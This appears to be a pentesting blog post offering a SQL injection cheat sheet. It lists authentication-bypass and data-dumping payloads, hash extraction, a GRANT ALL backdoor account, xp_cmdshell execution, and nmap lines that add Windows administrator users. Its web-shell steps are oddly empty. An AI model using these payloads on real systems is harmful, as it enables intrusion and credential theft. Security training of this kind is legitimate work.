Skip to main content

SQLDB Pentest

Pivoting for Red Teamers

SQL Database & SQL Injection Pentesting Cheat Sheet

SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques.

Step 1: Identifying SQL Database Type

Check the database type by sending payloads in the input fields or URL:

' OR 1=1 --     (MySQL, PostgreSQL, MSSQL)
' UNION SELECT 1,2,3 -- (Check column count)
' AND 1=CONVERT(int,@@version) -- (MSSQL Test)

Observe the error messages for database identification.

Step 2: Enumerating Database Tables & Columns

Use SQL queries to extract database structure.

For MySQL:

SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();
SELECT column_name FROM information_schema.columns WHERE table_name='users';

For MSSQL:

SELECT name FROM sysobjects WHERE xtype='U';  -- List Tables
SELECT name FROM syscolumns WHERE id=OBJECT_ID('users');  -- List Columns

Step 3: Extracting Data (SQL Injection Exploitation)

Inject SQL payloads into vulnerable parameters to retrieve data.

' UNION SELECT username,password FROM users --

Using subqueries to avoid detection:

' UNION SELECT (SELECT group_concat(username, ':', password) FROM users) --

Step 4: Bypassing Authentication via SQL Injection

Common authentication bypass payloads:

' OR '1'='1' -- 
' OR '1'='1'#
admin' --

If the login form is vulnerable, attackers can gain access to admin accounts.

Step 5: Privilege Escalation via SQL Injection

If you can execute SQL commands, escalate privileges:

For MySQL:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'newpassword';

For MSSQL (if xp_cmdshell is enabled):

EXEC xp_cmdshell 'whoami';  -- Execute system commands

Step 6: Extracting Hashes from the Database

Retrieve password hashes for cracking:

For MySQL:

SELECT user, host, password FROM mysql.user;

For MSSQL:

SELECT name, password_hash FROM sys.sql_logins;

Step 7: Blind SQL Injection

When errors are not displayed, use time-based blind SQL injection:

' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
' OR WAITFOR DELAY '0:0:5' -- (MSSQL)

Step 8: Using SQLMap for Automated SQL Injection

SQLMap automates SQL injection testing:

sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" --dump-all

Step 9: Extracting Files via SQL Injection

Retrieve server files using SQL queries.

For MySQL (OUTFILE method):

SELECT "" INTO OUTFILE '/var/www/html/shell.php';

For MSSQL (Bulk Insert):

BULK INSERT mytable FROM 'C:\inetpub\wwwroot\web.config';

Step 10: Web Shell Upload via SQL Injection

If file writing is enabled, upload a web shell:

SELECT "" INTO OUTFILE '/var/www/html/backdoor.php';

SQL enum with nmap

If file writing is enabled, upload a web shell:

nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user abc abc /add" 
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators user /add"
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.1

Mitigation Recommendations

  • Use prepared statements to prevent SQL injection.
  • Restrict database permissions to avoid privilege escalation.
  • Use Web Application Firewalls (WAF) to block malicious queries.
  • Sanitize user input and avoid dynamic SQL queries.
  • Regularly update and patch database management systems.

References

  • MSSQL Injection Cheat Sheet | pentestmonkey

    • Conclusion

    SQL injection remains one of the most critical security vulnerabilities. Proper security testing, patching, and mitigation techniques can help protect databases from exploitation.

Comments

Post a Comment

Popular posts from this blog

Powershell Automation Basics - Part 1

Pentest Notes: PowerShell Automation - Basics Pentest Notes: PowerShell Automation - Basics These notes cover PowerShell automation for penetration testing, focusing on practical applications and techniques. What is PowerShell? A powerful scripting language and command-line shell built on the .NET framework, heavily integrated with Windows. Ideal for system administration and automation, making it a valuable tool for pentesters. Why PowerShell for Pentesting? Native to Windows: Pre-installed on most Windows systems. Object-oriented: Allows for complex data manipulation and interaction with APIs. Access to .NET Framework: Enables interaction with a vast library of classes and functions. Remoting capabilities: Execute commands on remote systems. Bypass security restrictions: Can be used to circumvent some security measures if not properly configured. Basic Syntax Cmdlets: Commands in PowerShell (e.g., Get-Process , Get-Service , Get-ChildItem ). P...
Post a Comment
Read more

Pivoting Commands

Pivoting for Red Teamers Pivoting in Red Team Operations: A Complete Guide Introduction In a real-world red team operation , gaining initial access is just the beginning. The real challenge is pivoting —the ability to move laterally, escalate privileges, and compromise additional systems within the network. What is Pivoting? Pivoting is a technique used to route traffic through a compromised host to access internal networks that are not directly reachable. Types of Pivoting Network Pivoting : Routes network traffic through a compromised host (e.g., SSH Tunneling, Metasploit, ProxyChains). Port Forwarding : Exposes specific ports from an internal machine to the attacker (e.g., SSH Local Port Forwarding). Step 1: Pivoting Using Metasploit Setting Up a Pivot via Meterpreter meterpreter> backgroun...
Post a Comment
Read more